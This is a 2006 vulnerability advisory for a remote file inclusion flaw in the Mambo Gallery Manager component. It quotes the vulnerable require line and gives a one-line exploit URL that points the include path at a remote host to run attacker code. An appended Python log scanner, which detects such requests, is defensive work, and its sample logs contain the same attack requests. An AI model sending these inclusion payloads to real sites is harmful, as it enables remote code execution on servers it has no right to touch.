# Title : Mambo MGM Component <= 0.95r2 Remote Inclusion Vulnerability
# Published : 2006-07-28
# Author : A-S-T TEAM
----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
Script site: http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3 (mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path . "/administrator/components/com_mgm/diagnostics.mgm.php";
File inclusion via $mosConfig_absolute_path
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt
----------------------------------------------------------------------------------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,ALMOKAN3,Broken-proxy,troq AND ALL LEZR.COM Member
# www.Syue.com [2006-07-28]
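----------------------------------------------------
Added example (not part of the original advisory and not A-S-T TEAM's code): a Python scan of web-server access logs for requests that set mosConfig_absolute_path, the parameter used in the request above. The log lines, IP addresses and hosts are constructed samples; the combined log format and the rule that this configuration variable is never a legitimate request parameter are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Variable named in the advisory. Assumption: it is a site configuration
# value, so it is not expected to appear in any request.
PARAM = "mosConfig_absolute_path"
# Start of an access-log line in "combined" format (assumed format).
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# Values that would make a PHP require read from a URL or stream wrapper.
REMOTE_RE = re.compile(r'^(?:(?:https?|ftps?)://|(?:php|data|expect):)', re.I)

# Constructed sample log (documentation IP ranges, .example hosts).
SAMPLE_LOG = '''\
203.0.113.7 - - [28/Jul/2006:10:01:02 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://remote.example/a.txt HTTP/1.1" 200 512
203.0.113.7 - - [28/Jul/2006:10:01:09 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http%3A%2F%2Fremote.example%2Fa.txt HTTP/1.1" 404 210
198.51.100.4 - - [28/Jul/2006:10:02:00 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=/tmp HTTP/1.1" 500 0
192.0.2.10 - - [28/Jul/2006:10:03:00 +0000] "GET /index.php?option=com_mgm&return=http://www.example.com/ HTTP/1.1" 200 9001
192.0.2.10 - - [28/Jul/2006:10:03:05 +0000] "GET /index.php?option=com_mgm&Itemid=5 HTTP/1.1" 200 8450
'''

def classify(value):
    """Return 'remote-include' for URL/wrapper values, else 'config-override'."""
    return "remote-include" if REMOTE_RE.match(value.strip()) else "config-override"

def find_attempts(log_text):
    """Return (client_ip, status, path, verdict) for each request setting PARAM."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not a request line we can parse
        ip, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes, so encoded and plain values compare equal.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == PARAM:
                hits.append((ip, int(status), parts.path, classify(value)))
    return hits

if __name__ == "__main__":
    for hit in find_attempts(SAMPLE_LOG):
        print(hit)
```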